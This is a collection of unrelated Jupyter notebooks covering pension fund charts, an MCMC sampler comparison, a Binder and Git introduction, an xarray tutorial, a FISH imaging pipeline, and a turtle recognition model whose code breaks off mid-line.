``` lst = trimBy(lst, lst) lst = [s / s[0] for s in lst] # finals = [(s, s[-1]) for s in lst] # finals = sorted(finals, key=lambda x: x[1]) # medianSer = finals[len(finals) // 2][0] medianSer = getMedianSer(lst) lst2 = [s / medianSer for s in lst] show(lst2, base, ta=False, legend=False) ``` ## סך נכסים מנוהלים וצבירה נטו לפי סוג קופה ``` aum = mdf.groupby(["month", "type"])["AUM"].sum() aum = aum.unstack() show(aum, ta=False, log=False, title="AUM") net_flow = mdf.groupby(["month", "type"])["net_flow"].sum() net_flow = net_flow.unstack() net_flow = net_flow.cumsum() total = net_flow.sum(axis=1) total.name = "Total" show(net_flow, total, ta=False, log=False, title="Cumulative Net Flow") ``` ## סך נכסים מנוהלים וצבירה נטו בקרנות השתלמות במסלול כללי ``` aums = list(map(getAum, allKranotIDs)) flowSums = list(map(getFlowSum, allKranotIDs)) aums = [s for s in aums if "כללי" in s.name] aums = [s for s in aums if not " ** " in s.name] # exclude exclusive funds for specific sectors flowSums = [s for s in flowSums if "כללי" in s.name] flowSums = [s for s in flowSums if not " ** " in s.name] # exclude exclusive funds for specific sectors show(aums, ta=False, legend=False) show(flowSums, ta=False, legend=False) ``` ## סך נכסים מנוהלים וצבירה נטו ותשואה בקרן ספציפית ``` id = 1377 flowsum = getFlowSum(id) aum = getAum(id) gains = getKeren(id) show(aum , flowsum, gains, ta=True) # be sure to save before you publish # when done, you will get a public link to an HTML file with the results publish() ```
github_jupyter
``` import arviz as az import pymc3 as pm import pystan import emcee import matplotlib.pyplot as plt import numpy as np from multiprocessing import Pool ``` # Model The model on which to perform the simulation will be the estimation of the mean of a Normal variable having observed a 0. We will use: $$ p(\theta) = \mathcal{N}(0, 10)\\ p(y|\theta) = \mathcal{N}(\theta, 2)\\ p(\theta|y) \sim p(y|\theta)p(\theta) \sim \exp\left(-\frac{(y-\theta)^2}{8}\right)\exp\left(-\frac{\theta^2}{200}\right)\\ p(\theta|0) \sim \exp\left(-\frac{\theta^2}{8}\right)\exp\left(-\frac{\theta^2}{200}\right) = \exp\left(-\frac{\theta^2}{200/26}\right) $$ Therefore, our posterior can be calculated analytically, and it turns out to be $\mathcal{N}(0, \frac{10}{\sqrt{26}})$, whose pdf is: $$ p(\theta|0) = \frac{1}{\sqrt{2\pi}\frac{100}{26}} \exp\left(-\frac{13\theta^2}{100}\right)$$ ``` sigma2 = 100/26 ``` ## Utils ``` def ess_evolution(samples): chains, draws = samples.shape idxs = np.unique(np.geomspace(5, draws, 500, dtype=int)) ess_samples = np.empty(idxs.size) for i, idx in enumerate(idxs): ess_samples[i] = az.ess(samples[:, :idx], method="mean") return idxs, ess_samples def plot_ess_evolution(samples, idxs, ess_samples, title="", variance=sigma2): chains, draws = samples.shape plt.loglog((samples.sum(axis=0).cumsum() / (np.arange(draws)*chains)) ** 2, label="var_err"); plt.loglog(idxs, sigma2/ess_samples, label="var/ess"); plt.legend(loc="lower left"); plt.title(title); plt.axis(ymin=1e-8); ``` # PyMC3 ``` with pm.Model() as model: theta = pm.Normal("theta", mu=0, sigma=10) y = pm.Normal("y", mu=theta, sigma=2, observed=0) trace = pm.sample(draws=700000, chains=4, tune=300000) idata_pymc3 = az.from_pymc3(trace) idata_pymc3.to_netcdf("pymc3_post_autocorr.nc") idata_pymc3 = az.from_netcdf("pymc3_post_autocorr.nc") ``` ### Chain average ``` idxs, ess_samples = ess_evolution(idata_pymc3.posterior.theta.values) plot_ess_evolution(idata_pymc3.posterior.theta.values, idxs, ess_samples, title="PyMC3") ``` # PyStan ``` stan_code = """ data { real y; } parameters { real theta; } model { theta ~ normal(0, 10); y ~ normal(theta, 2); } """ stan_model = pystan.StanModel(model_code=stan_code) fit = stan_model.sampling(data={"y": 0}, chains=4, iter=10**6, warmup=300000) idata_pystan = az.from_pystan(fit) idata_pystan.to_netcdf("pystan_post_autocorr.nc") idata_pystan = az.from_netcdf("pystan_post_autocorr.nc") ``` ### Chain average ``` idxs, ess_samples = ess_evolution(idata_pystan.posterior.theta.values) plot_ess_evolution(idata_pystan.posterior.theta.values, idxs, ess_samples, title="PyStan") ``` # emcee ``` def lnprob(theta): return -13 * theta**2 / 100 nwalkers = 6 ndim = 1 draws = 701000 pos = np.random.normal(size=(nwalkers, ndim)) sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob) sampler.run_mcmc(pos, draws, progress=True); idata_emcee = az.from_emcee(sampler, var_names=["theta"]) idata_emcee.sel(draw=slice(1000, None)) idata_emcee.to_netcdf("emcee_post_autocorr.nc") idata_emcee = az.from_netcdf("emcee_post_autocorr.nc") ``` ### Chain average ``` idxs, ess_samples = ess_evolution(idata_emcee.posterior.theta.values) plot_ess_evolution(idata_emcee.posterior.theta.values, idxs, ess_samples, title="emcee") ``` ## Check all samplers got the same posterior ``` az.plot_density([idata_emcee, idata_pystan, idata_pymc3]) ```
github_jupyter
# Software Carpentry # Welcome to Binder This is where will do all our Python, Shell and Git live coding. ## Jupyter Lab Let's quickly familiarise ourselves with the enironment ... - the overal environment (ie your entire browser tab) is called: *Jupyter Lab* it contains menus, tabs, toolbars and a file browser - Jupyter Lab allows you to *launch* files and application into the *Work Area*. Right now you probably have two tabs in the *Work Area* - this document an another tab called *Launcher*. ## Juptyer Notebooks - this document is document is called an: *Interactive Python Notebook* (or Notebook for short) Notebooks are a documents (files) made up of a sequence of *cells* that contain either code (python in our case) or documentation (text, or formatted text called *markdown*). ### Cells The three types of Cells are: - *Markdown* - formatted text like this cell (with *italics*, **bold** and tables etc ...) - *Raw* - like the following cell, and - *Code* - (in our case) python code Cells can be modified by simply clicking inside them and typing. See if you can change the cell below by replacing *boring* with something more exciting. #### Executing Cells Both *markdown* and *code* cells can be excuted, Excuting a *markdown* causes the *formatted* version of the cell to be displayed. Excuting a *code* cell causes the code to run and any results are displayed below the cell. Any cell can be executed by pressing the play icon at the top of the document while the cell is highlighted. You can also press **CTL-ENTER** to excute the active cell. Go ahead and make some more changes to the cells above and execute them - what happens when you execute a *Raw* cell ? #### Adding a Removing Cells You can use the `+` (plus icon) at the top of the docuement to add a new cell, and the cell type drop down the change the type. You can also use the A key to add cell *above* the current cell and the B key to add *below* the current cell. Now add a couple of cell of your own ... #### Code Cells Code cells allow us to write (in our case Python) and run our code and see the results right inside the notebook. The next cell is a code cell that contains Python code to add 4 numbers. Try executing the cell and if get the right result, try some more/different numbers ``` 1 + 2 + 3 + 4 ``` ## Let's save our work so for and Push to our changes to GitHub ### Saving By pressing the save icon on the document (or File -> Save Notebook) we can save our work to our Binder environment. ### But what about Version Control and Git (wasn't that in the Workshop syllabus) Since our binder environment will dissappear when we are no longer using is, we need cause our new version to be saved some where permanent. Luckly we have a GitHub respository already connected to our current environment - however there are couple steps required to make our GitHub repository match the copy of the respository inside our Binder environment. #### Git likes to know how you are ... otherwise it keeps complaining it cannot track who made what commits (changes). To tell Git who you are, we need to do the following: - Launch a Terminal sesson (File -> New -> Terminal, or you can use the *Laucher* tab - At the command prompt, type: `git-setup` This operation only needs to be done once per binder session. #### Add your changed files to git's list of files to track - at the same terminal prompt type: `git add .` #### Tell Git to commit (record) this state as a version - at the same terminal prompt type: `git commit -m "changes made inside binder"` at this point git has added an additional version of your files to your repository inside your curren Binder environment. However, your repository on GitHub remains unchanges (you might like to go check). #### Tell Git to push the new commit (version) to GitHub - again at the same prompt type: `git push` once you supply the correct GitHub usename and password, all your changes will be pushed. Go check out your respository on github.com ...
github_jupyter
![xarray Logo](http://xarray.pydata.org/en/stable/_static/dataset-diagram-logo.png "xarray Logo") # Introduction to Xarray --- ## Overview This notebook will introduce the basics of gridded, labeled data with Xarray. Since Xarray introduces additional abstractions on top of plain arrays of data, our goal is to show why these abstractions are useful and how they frequently lead to simpler, more robust code. We'll cover these topics: 1. Create a `DataArray`, one of the core object types in Xarray 1. Understand how to use named coordinates and metadata in a `DataArray` 1. Combine individual `DataArrays` into a `Dataset`, the other core object type in Xarray 1. Subset, slice, and interpolate the data using named coordinates 1. Open netCDF data using XArray 1. Basic subsetting and aggregation of a `Dataset` 1. Brief introduction to plotting with Xarray ## Prerequisites | Concepts | Importance | Notes | | --- | --- | --- | | [NumPy Basics](../numpy/numpy-basics) | Necessary | | | [Intermediate NumPy](../numpy/intermediate-numpy) | Helpful | Familiarity with indexing and slicing arrays | | [NumPy Broadcasting](../numpy/numpy-broadcasting) | Helpful | Familiar with array arithmetic and broadcasting | | [Introduction to Pandas](../pandas/pandas) | Helpful | Familiarity with labeled data | | [Datetime](../datetime/datetime) | Helpful | Familiarity with time formats and the `timedelta` object | | [Understanding of NetCDF](some-link-to-external-resource) | Helpful | Familiarity with metadata structure | - **Time to learn**: 40 minutes --- ## Imports Simmilar to `numpy`, `np`; `pandas`, `pd`; you may often encounter `xarray` imported within a shortened namespace as `xr`. `pythia_datasets` provides example data for us to work with. ``` from datetime import timedelta import numpy as np import pandas as pd import xarray as xr from pythia_datasets import DATASETS ``` ## Introducing the `DataArray` and `Dataset` Xarray expands on the capabilities on NumPy arrays, providing a lot of streamlined data manipulation. It is similar in that respect to Pandas, but whereas Pandas excels at working with tabular data, Xarray is focused on N-dimensional arrays of data (i.e. grids). Its interface is based largely on the netCDF data model (variables, attributes, and dimensions), but it goes beyond the traditional netCDF interfaces to provide functionality similar to netCDF-java's [Common Data Model (CDM)](https://docs.unidata.ucar.edu/netcdf-java/current/userguide/common_data_model_overview.html). ### Creation of a `DataArray` object The `DataArray` is one of the basic building blocks of Xarray (see docs [here](http://xarray.pydata.org/en/stable/user-guide/data-structures.html#dataarray)). It provides a `numpy.ndarray`-like object that expands to provide two critical pieces of functionality: 1. Coordinate names and values are stored with the data, making slicing and indexing much more powerful 2. It has a built-in container for attributes Here we'll initialize a `DataArray` object by wrapping a plain NumPy array, and explore a few of its properties. #### Generate a random numpy array For our first example, we'll just create a random array of "temperature" data in units of Kelvin: ``` data = 283 + 5 * np.random.randn(5, 3, 4) data ``` #### Wrap the array: first attempt Now we create a basic `DataArray` just by passing our plain `data` as input: ``` temp = xr.DataArray(data) temp ``` Note two things: 1. Xarray generates some basic dimension names for us (`dim_0`, `dim_1`, `dim_2`). We'll improve this with better names in the next example. 2. Wrapping the numpy array in a `DataArray` gives us a rich display in the notebook! (Try clicking the array symbol to expand or collapse the view) #### Assign dimension names Much of the power of Xarray comes from making use of named dimensions. So let's add some more useful names! We can do that by passing an ordered list of names using the keyword argument `dims`: ``` temp = xr.DataArray(data, dims=['time', 'lat', 'lon']) temp ``` This is already improved upon from a NumPy array, because we have names for each of the dimensions (or axes in NumPy parlance). Even better, we can take arrays representing the values for the coordinates for each of these dimensions and associate them with the data when we create the `DataArray`. We'll see this in the next example. ### Create a `DataArray` with named Coordinates #### Make time and space coordinates Here we will use [Pandas](../pandas) to create an array of [datetime data](../datetime), which we will then use to create a `DataArray` with a named coordinate `time`. ``` times = pd.date_range('2018-01-01', periods=5) times ``` We'll also create arrays to represent sample longitude and latitude: ``` lons = np.linspace(-120, -60, 4) lats = np.linspace(25, 55, 3) ``` #### Initialize the `DataArray` with complete coordinate info When we create the `DataArray` instance, we pass in the arrays we just created: ``` temp = xr.DataArray(data, coords=[times, lats, lons], dims=['time', 'lat', 'lon']) temp ``` #### Set useful attributes ...and while we're at it, we can also set some attribute metadata: ``` temp.attrs['units'] = 'kelvin' temp.attrs['standard_name'] = 'air_temperature' temp ``` #### Attributes are not preserved by default! Notice what happens if we perform a mathematical operaton with the `DataArray`: the coordinate values persist, but the attributes are lost. This is done because it is very challenging to know if the attribute metadata is still correct or appropriate after arbitrary arithmetic operations. To illustrate this, we'll do a simple unit conversion from Kelvin to Celsius: ``` temp_in_celsius = temp - 273.15 temp_in_celsius ``` For an in-depth discussion of how Xarray handles metadata, start in the Xarray docs [here](http://xarray.pydata.org/en/stable/getting-started-guide/faq.html#approach-to-metadata). ### The `Dataset`: a container for `DataArray`s with shared coordinates Along with `DataArray`, the other key object type in Xarray is the `Dataset`: a dictionary-like container that holds one or more `DataArray`s, which can also optionally share coordinates (see docs [here](http://xarray.pydata.org/en/stable/user-guide/data-structures.html#dataset)). The most common way to create a `Dataset` object is to load data from a file (see [below](#Opening-netCDF-data)). Here, instead, we will create another `DataArray` and combine it with our `temp` data. This will illustrate how the information about common coordinate axes is used. #### Create a pressure `DataArray` using the same coordinates This code mirrors how we created the `temp` object above. ``` pressure_data = 1000.0 + 5 * np.random.randn(5, 3, 4) pressure = xr.DataArray( pressure_data, coords=[times, lats, lons], dims=['time', 'lat', 'lon'] ) pressure.attrs['units'] = 'hPa' pressure.attrs['standard_name'] = 'air_pressure' pressure ``` #### Create a `Dataset` object Each `DataArray` in our `Dataset` needs a name! The most straightforward way to create a `Dataset` with our `temp` and `pressure` arrays is to pass a dictionary using the keyword argument `data_vars`: ``` ds = xr.Dataset(data_vars={'Temperature': temp, 'Pressure': pressure}) ds ``` Notice that the `Dataset` object `ds` is aware that both data arrays sit on the same coordinate axes. #### Access Data variables and Coordinates in a `Dataset` We can pull out any of the individual `DataArray` objects in a few different ways. Using the "dot" notation: ``` ds.Pressure ``` ... or using dictionary access like this: ``` ds['Pressure'] ``` We'll return to the `Dataset` object when we start loading data from files. ## Subsetting and selection by coordinate values Much of the power of labeled coordinates comes from the ability to select data based on coordinate names and values, rather than array indices. We'll explore this briefly here. ### NumPy-like selection Suppose we want to extract all the spatial data for one single date: January 2, 2018. It's possible to achieve that with NumPy-like index selection: ``` indexed_selection = temp[1, :, :] # Index 1 along axis 0 is the time slice we want... indexed_selection ``` HOWEVER, notice that this requires us (the user / programmer) to have **detailed knowledge** of the order of the axes and the meaning of the indices along those axes! _**Named coordinates free us from this burden...**_ ### Selecting with `.sel()` We can instead select data based on coordinate values using the `.sel()` method, which takes one or more named coordinate(s) as keyword argument: ``` named_selection = temp.sel(time='2018-01-02') named_selection ``` We got the same result, but - we didn't have to know anything about how the array was created or stored - our code is agnostic about how many dimensions we are dealing with - the intended meaning of our code is much clearer! ### Approximate selection and interpolation With time and space data, we frequently want to sample "near" the coordinate points in our dataset. Here are a few simple ways to achieve that. #### Nearest-neighbor sampling Suppose we want to sample the nearest datapoint within 2 days of date `2018-01-07`. Since the last day on our `time` axis is `2018-01-05`, this is well-posed. `.sel` has the flexibility to perform nearest neighbor sampling, taking an optional tolerance: ``` temp.sel(time='2018-01-07', method='nearest', tolerance=timedelta(days=2)) ``` where we see that `.sel` indeed pulled out the data for date `2018-01-05`. #### Interpolation Suppose we want to extract a timeseries for Boulder (40°N, 105°W). Since `lon=-105` is _not_ a point on our longitude axis, this requires interpolation between data points. The `.interp()` method (see the docs [here](http://xarray.pydata.org/en/stable/interpolation.html)) works similarly to `.sel()`. Using `.interp()`, we can interpolate to any latitude/longitude location: ``` temp.interp(lon=-105, lat=40) ``` <div class="admonition alert alert-info"> <p class="admonition-title" style="font-weight:bold">Info</p> Xarray's interpolation functionality requires the <a href="https://scipy.org/">SciPy</a> package! </div> ### Slicing along coordinates Frequently we want to select a range (or _slice_) along one or more coordinate(s). We can achieve this by passing a Python [slice](https://docs.python.org/3/library/functions.html#slice) object to `.sel()`, as follows: ``` temp.sel( time=slice('2018-01-01', '2018-01-03'), lon=slice(-110, -70), lat=slice(25, 45) ) ``` <div class="admonition alert alert-info"> <p class="admonition-title" style="font-weight:bold">Info</p> The calling sequence for <code>slice</code> always looks like <code>slice(start, stop[, step])</code>, where <code>step</code> is optional. </div> Notice how the length of each coordinate axis has changed due to our slicing. ### One more selection method: `.loc` All of these operations can also be done within square brackets on the `.loc` attribute of the `DataArray`: ``` temp.loc['2018-01-02'] ``` This is sort of in between the NumPy-style selection ``` temp[1,:,:] ``` and the fully label-based selection using `.sel()` With `.loc`, we make use of the coordinate *values*, but lose the ability to specify the *names* of the various dimensions. Instead, the slicing must be done in the correct order: ``` temp.loc['2018-01-01':'2018-01-03', 25:45, -110:-70] ``` One advantage of using `.loc` is that we can use NumPy-style slice notation like `25:45`, rather than the more verbose `slice(25,45)`. But of course that also works: ``` temp.loc['2018-01-01':'2018-01-03', slice(25, 45), -110:-70] ``` What *doesn't* work is passing the slices in a different order: ``` # This will generate an error # temp.loc[-110:-70, 25:45,'2018-01-01':'2018-01-03'] ``` ## Opening netCDF data With its close ties to the netCDF data model, Xarray also supports netCDF as a first-class file format. This means it has easy support for opening netCDF datasets, so long as they conform to some of Xarray's limitations (such as 1-dimensional coordinates). ### Access netCDF data with `xr.open_dataset` <div class="admonition alert alert-info"> <p class="admonition-title" style="font-weight:bold">Info</p> Here we're getting the data from Project Pythia's custom library of example data, which we already imported above with <code>from pythia_datasets import DATASETS</code>. The <code>DATASETS.fetch()</code> method will automatically download and cache our example data file <code>NARR_19930313_0000.nc</code> locally. </div> ``` filepath = DATASETS.fetch('NARR_19930313_0000.nc') ``` Once we have a valid path to a data file that Xarray knows how to read, we can open it like this: ``` ds = xr.open_dataset(filepath) ds ``` ### Subsetting the `Dataset` Our call to `xr.open_dataset()` above returned a `Dataset` object that we've decided to call `ds`. We can then pull out individual fields: ``` ds.isobaric1 ``` (recall that we can also use dictionary syntax like `ds['isobaric1']` to do the same thing) `Dataset`s also support much of the same subsetting operations as `DataArray`, but will perform the operation on all data: ``` ds_1000 = ds.sel(isobaric1=1000.0) ds_1000 ``` And further subsetting to a single `DataArray`: ``` ds_1000.Temperature_isobaric ``` ### Aggregation operations Not only can you use the named dimensions for manual slicing and indexing of data, but you can also use it to control aggregation operations, like `std` (standard deviation): ``` u_winds = ds['u-component_of_wind_isobaric'] u_winds.std(dim=['x', 'y']) ``` <div class="admonition alert alert-info"> <p class="admonition-title" style="font-weight:bold">Info</p> Aggregation methods for Xarray objects operate over the named coordinate dimension(s) specified by keyword argument <code>dim</code>. Compare to NumPy, where aggregations operate over specified numbered <code>axes</code>. </div> Using the sample dataset, we can calculate the mean temperature profile (temperature as a function of pressure) over Colorado within this dataset. For this exercise, consider the bounds of Colorado to be: * x: -182km to 424km * y: -1450km to -990km (37°N to 41°N and 102°W to 109°W projected to Lambert Conformal projection coordinates) ``` temps = ds.Temperature_isobaric co_temps = temps.sel(x=slice(-182, 424), y=slice(-1450, -990)) prof = co_temps.mean(dim=['x', 'y']) prof ``` ## Plotting with Xarray Another major benefit of using labeled data structures is that they enable automated plotting with sensible axis labels. ### Simple visualization with `.plot()` Much like we saw in [Pandas](../pandas/pandas), Xarray includes an interface to [Matplotlib](../matplotlib) that we can access through the `.plot()` method of every `DataArray`. For quick and easy data exploration, we can just call `.plot()` without any modifiers: ``` prof.plot() ``` Here Xarray has generated a line plot of the temperature data against the coordinate variable `isobaric`. Also the metadata are used to auto-generate axis labels and units. ### Customizing the plot As in Pandas, the `.plot()` method is mostly just a wrapper to Matplotlib, so we can customize our plot in familiar ways. In this air temperature profile example, we would like to make two changes: - swap the axes so that we have isobaric levels on the y (vertical) axis of the figure - make pressure decrease upward in the figure, so that up is up A few keyword arguments to our `.plot()` call will take care of this: ``` prof.plot(y="isobaric1", yincrease=False) ``` ### Plotting 2D data In the example above, the `.plot()` method produced a line plot. What if we call `.plot()` on a 2D array? ``` temps.sel(isobaric1=1000).plot() ``` Xarray has recognized that the `DataArray` object calling the plot method has two coordinate variables, and generates a 2D plot using the `pcolormesh` method from Matplotlib. In this case, we are looking at air temperatures on the 1000 hPa isobaric surface over North America. We could of course improve this figure by using [Cartopy](../cartopy) to handle the map projection and geographic features! --- ## Summary Xarray brings the joy of Pandas-style labeled data operations to N-dimensional data. As such, it has become a central workhorse in the geoscience community for the analysis of gridded datasets. Xarray allows us to open self-describing NetCDF files and make full use of the coordinate axes, labels, units, and other metadata. By making use of labeled coordinates, our code is often easier to write, easier to read, and more robust. ### What's next? Additional notebooks to appear in this section will go into more detail about - arithemtic and broadcasting with Xarray data structures - using "group by" operations - remote data access with OpenDAP - more advanced visualization including map integration with Cartopy ## Resources and references This notebook was adapated from material in [Unidata's Python Training](https://unidata.github.io/python-training/workshop/XArray/xarray-and-cf/). The best resource for Xarray is the [Xarray documentation](http://xarray.pydata.org/en/stable/). See in particular - [Why Xarray](http://xarray.pydata.org/en/stable/getting-started-guide/why-xarray.html) - [Quick overview](http://xarray.pydata.org/en/stable/getting-started-guide/quick-overview.html#) - [Example gallery](http://xarray.pydata.org/en/stable/gallery.html) Another excellent resource is this [Xarray Tutorial collection](https://xarray-contrib.github.io/xarray-tutorial/).
github_jupyter
__Author:__ Bogdan Bintu __Email:__ bbintu@g.harvard.edu __Date:__ 3/4/2020 #### Note: This assumes Python 2 ``` # Imports import numpy as np import glob,os,sys import matplotlib.pylab as plt import workers #worker package to parallelize #Warning: Installing ipyparallel is recomended ``` ### 1. Raw imaging data structure description This code assumes the data is stored in a __master_folder__ with subfolders organized by rounds of hybridization i.e.: __H1R1,R2__ - correpsonds to the 2nd round of imaging the fluorsecent signal in which readout 3 is imaged in the first color channel, readout 4 is imaged in the second color channel and fiducial beads are imaged in the third color chanel. For each z-pozition the three color chanels are imaged, the z-piezo is moved one step (100-250nm) and then the imaging of the three color channels is repeated etc. This folder contains multiple .dax imaging files (and associated info files) organized per field of view (i.e. Conv_zscan_00.dax correponds to the 1st field of view, Conv_zscan_01.dax correponds to the 2nd field of view etc.). __H2R3,R4__ - correpsonds to the 2nd round of imaging the fluorsecent signal in which readout 3 is imaged in the first color channel, readout 4 is imaged in the second color channel and fiducial beads are imaged in the third color chanel. The z-step imaging and file format within each folder follows the same description above fora each folder unless specified. ... __H0B,B__ - corresponds to the first round of imaging, before flowing readout sequences (typically across all color 5 available channels in an alternating fashion) (B - indicates that there is no fluorescent signal in that channel) ... __H1Q1,Q2,Q3__ - correpsonds to the 1nd round of imaging the fluorsecent signal of RNA (Q-denotes RNA readouts) in which RNA readout 1 is imaged in the first color channel, RNA readout 2 is imaged in the second color channel, RNA readout 3 is imaged in the third color channel and fiducial beads are imaged in the fourth color chanel. ### 2. Organize the data and flatten the illumination profile ``` ######### Get the info for the current project master_folder=r'master_DNA_folder' hfolders = [folder for folder in glob.glob(master_folder+os.sep+'*') if os.path.isdir(folder) and glob.glob(folder+os.sep+'*.dax')>0 and os.path.basename(folder)[0]!='F'] hinds = [workers.getH(hfolder) for hfolder in hfolders] hfolders = np.array(hfolders)[np.argsort(hinds)] fovs = map(os.path.basename,glob.glob(hfolders[0]+os.sep+'*.dax')) analysis_folder = master_folder+'-Analysis' if not os.path.exists(analysis_folder): os.makedirs(analysis_folder) ######### compute the median value across all fields of view - this helps flatten the illumination num_cols,remove_first = 4,0 hfolder = hfolders[10] print hfolder meds_fl = analysis_folder+os.sep+'im_meds.npy' if not os.path.exists(meds_fl): im_meds = [np.mean([workers.get_frame(hfolder+os.sep+fov,ind_z=ind_col+remove_first) for fov in fovs],axis=0) for ind_col in range(num_cols)] np.save(meds_fl,np.array(im_meds,dtype=np.float32)) #### check illumination profile im_med = np.load(meds_fl) plt.figure(figsize=(5,5)) im = im_med[3] plt.imshow(im,vmax=np.percentile(im,95)*1.2) plt.colorbar() ``` ### 3. Run the rough alignment and fiducial drift fitting across all fileds of view and all imaging rounds ``` def ref_fl(dax_fl,ref_tags = ['H20B,B','H20B,B']): htag = os.path.basename(os.path.dirname(dax_fl)) fov = os.path.basename(dax_fl) ref_tag = ref_tags[-1] if 'Q' in htag else ref_tags[0] ref_hfolder = [hfolder for hfolder in hfolders if ref_tag in os.path.basename(hfolder)][0] dax_fl_ref = ref_hfolder+os.sep+fov return dax_fl_ref paramaters = [] overwrite_fits,overwrite_drift=False,False for fovind in range(len(fovs)): for hind in range(len(hfolders)): htag = os.path.basename(hfolders[hind]) dax_fl = hfolders[hind]+os.sep+fovs[fovind] ref_dax_fl = ref_fl(dax_fl) paramaters.append((dax_fl,ref_dax_fl,overwrite_fits,overwrite_drift)) print len(paramaters) ``` #### Run across all data in paralell ``` #Run the workers in parallel to perform rough registration and fit the beads in the data. # while workers can also perform rough (yet fast) fitting of the signal data, #this is mostly used for testing as the gaussian fitting is more precise #Add path to the system to be able to import #Open terminal and run: ipcluster start -n 20 import ipyparallel as ipp from ipyparallel import Client rc = Client() import workers reload(workers) def f(parm): import sys sys.path.append(r'E:\Bogdan\Dropbox\code_Seurat\WholeGenome_MERFISH\Analysis_code') import workers reload(workers) success = workers.run_fitting_analysis(parm,remove_first=0,im_pad=0,fit_colors=False) return success res = rc[:].map_sync(f,paramaters[:]) ``` #### Example of single run output ``` f(paramaters[3000]) ```
github_jupyter
# Turtle Recall A facial recognition model for turtles https://zindi.africa/competitions/turtle-recall-conservation-challenge/data # Imports ``` import tensorflow as tf import pandas as pd import numpy as np import matplotlib.pyplot as plt import os import datetime import tqdm from PIL import Image print(f'TensorFlow version is {tf.__version__}') physical_devices = tf.config.list_physical_devices('GPU') print("Num GPUs:", len(physical_devices)) %load_ext tensorboard ``` # Dataset First, we load the data. In addition to the turtles and images from the train.csv file, we also make use of extra_images.csv by concatenation with the train file. This yields substantially more (ca. 10.000) image files to later train the model on. ``` train = pd.read_csv("./data/train.csv") extra_images = pd.read_csv("./data/extra_images.csv") # Convert image_location strings to lowercase. for row in [train]: row.image_location = row.image_location.apply(lambda x: x.lower()) assert set(row.image_location.unique()) == set(['left', 'right', 'top']) df = pd.concat(objs=[train, extra_images]) images_per_turtle = pd.value_counts(df.turtle_id) print(f'The total number of turtles is {len(df.turtle_id.unique())}.\n' 'The mean number of training images per turtle is ' f'{round(np.mean(images_per_turtle), 2)}, ' f'and the median is {int(np.median(images_per_turtle))}.') ``` As we can see, however, we don't get a lot of images per turtle on average. Actually, some 2000 turtles are represented with less than 10 images in the dataset, which leads to a huge imbalance. Hence, we decide not to make use of any turtle with less than `MIN_NR_IMGS`. ``` from utils import MIN_NR_IMGS im_per_turtle = images_per_turtle[images_per_turtle >= MIN_NR_IMGS].to_frame() df = df[df.turtle_id.isin(im_per_turtle.index)].reset_index() images_per_turtle = pd.value_counts(df.turtle_id) print(f'The total number of turtles after removal is {len(df.turtle_id.unique())}.\n' 'The mean number of training images per turtle is now ' f'{round(np.mean(images_per_turtle), 2)}, ' f'and the median is {int(np.median(images_per_turtle))}. \n' f'The smallest number of images per turtle is ' f'{min(df.turtle_id.value_counts())}.') print(df.shape) df.head(3) ``` We have now removed a significant portion of the data and are left with about 5000 images, which is still more than double the amount of the initial images in the `train.csv`. There is, however, still a huge imbalance in the dataset and the total number of files is quite small. ``` plt.hist(x=images_per_turtle, rwidth=0.9, bins=20) plt.xlabel('Images per turtle', fontfamily='serif', bbox=dict(facecolor='none', edgecolor='black')) plt.xticks(fontfamily='serif') plt.yticks(fontfamily='serif') #plt.savefig('images_per_turtle.png') plt.show() ``` # Preprocessing We create mappings and get the paths to the image files. After that follows some basic and some advanced preprocessing. ``` from utils import IMAGE_DIR turtle_ids = sorted(np.unique(df.turtle_id)) + ['new_turtle'] image_files = [os.path.join(IMAGE_DIR, f) for f in os.listdir(IMAGE_DIR) if f.split('.')[0] in df.image_id.values] image_ids = [os.path.basename(f).split('.')[0] for f in image_files] image_to_turtle = dict(zip(df.image_id, df.turtle_id)) labels = dict(zip(turtle_ids, np.arange(len(turtle_ids)))) loaded_labels = [labels[image_to_turtle[id]] for id in image_ids] NUM_CLASSES = len(turtle_ids) print(f'Number of turtles (classes): {NUM_CLASSES}') from utils import IMAGE_SIZE def crop_and_resize(pil_img, img_size=IMAGE_SIZE): """Crop square from center of image and resize.""" w, h = pil_img.size crop_size = min(w, h) crop = pil_img.crop(((w - crop_size) // 2, (h - crop_size) // 2, (w + crop_size) // 2, (h + crop_size) // 2)) return crop.resize(img_size) tqdm.tqdm._instances.clear() loaded_images = [crop_and_resize(Image.open(f)) for f in tqdm.tqdm(image_files)] # inspect an image print(loaded_images[0].size) print(len(loaded_images)) loaded_images[0] ims = tf.stack([tf.convert_to_tensor(np.asarray(im), dtype=tf.float32) for im in loaded_images]) labels = tf.stack(loaded_labels) train_ds = tf.data.Dataset.from_tensor_slices((ims, labels)) train_ds = train_ds.map(lambda x,y: (x/255., tf.one_hot(y, NUM_CLASSES))) print(f'The dataset contains {train_ds.cardinality().numpy()} images.') ``` ### Data augmentation https://colab.research.google.com/github/tensorflow/addons/blob/master/docs/tutorials/image_ops.ipynb#scrollTo=tbaIkUCS2eNv Before applying augmentation to our images and hence increasing the size of our training data, we shuffle the current dataset, take a few images and store them in a test set for eventually evaluating our model. We do this to preserve the real-world data we want our model to work on later. The augmentation is then only used on training and validation data to make sure our model learns with a variety of different images and is robust against noise, different colour and brightness values, etc. ``` BUFFER = train_ds.cardinality().numpy() TEST_SPLIT = 1000 #ds = ds.shuffle(buffer_size=BUFFER, reshuffle_each_iteration=False, ) test_ds, train_ds = train_ds.take(TEST_SPLIT), train_ds.skip(TEST_SPLIT) print( f'Train images: {train_ds.cardinality().numpy()}', f'Test images: {test_ds.cardinality().numpy()}', sep='\n') ``` We implemented a bunch of augmentation functions to enhance the small dataset. After applying them, we further split off a validation part from the training images which we can use during the training process to assess the progress. We then simply shuffle and batch each dataset, prefetch a few batches, and cache the datasets. ``` from functions.image_augmentation import rotate_images, apply_mean_filter, apply_gaussian_filter, random_hsv, add_noise ds_rotated = rotate_images(train_ds) ds_gaussian = apply_gaussian_filter(train_ds) ds_hsv = random_hsv(train_ds) ds_noise = add_noise(train_ds, 0.2) train_ds = train_ds.concatenate(ds_rotated).concatenate(ds_gaussian).concatenate(ds_hsv).concatenate(ds_noise) from utils import BATCH_SIZE TRAIN_SPLIT = np.round(train_ds.cardinality().numpy() * 0.8) train_ds, val_ds = train_ds.take(TRAIN_SPLIT), train_ds.skip(TRAIN_SPLIT) train_ds = train_ds.shuffle(512).batch(BATCH_SIZE, drop_remainder=True).prefetch(tf.data.experimental.AUTOTUNE) train_ds = train_ds.cache(filename='cached_train_ds') val_ds = 